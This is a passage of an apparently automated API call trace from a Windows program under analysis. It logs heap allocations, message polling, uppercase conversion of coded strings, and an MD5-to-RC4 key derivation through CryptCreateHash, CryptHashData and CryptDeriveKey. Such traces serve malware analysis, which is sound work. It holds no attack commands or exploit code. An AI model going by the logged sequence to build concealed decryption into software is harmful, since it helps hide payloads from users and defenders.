(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0161.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.621] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.621] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.622] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.622] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.622] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0161.622] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0161.623] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0161.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.623] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.624] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.626] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.626] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0161.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.627] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.627] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.627] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.627] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.627] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.627] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.627] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.627] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.628] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.628] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0161.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.629] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0161.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.629] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.629] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.630] CryptHashData (hHash=0xaa55e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0161.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.630] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.630] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.630] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.630] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.631] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.631] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.631] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.631] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.631] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: 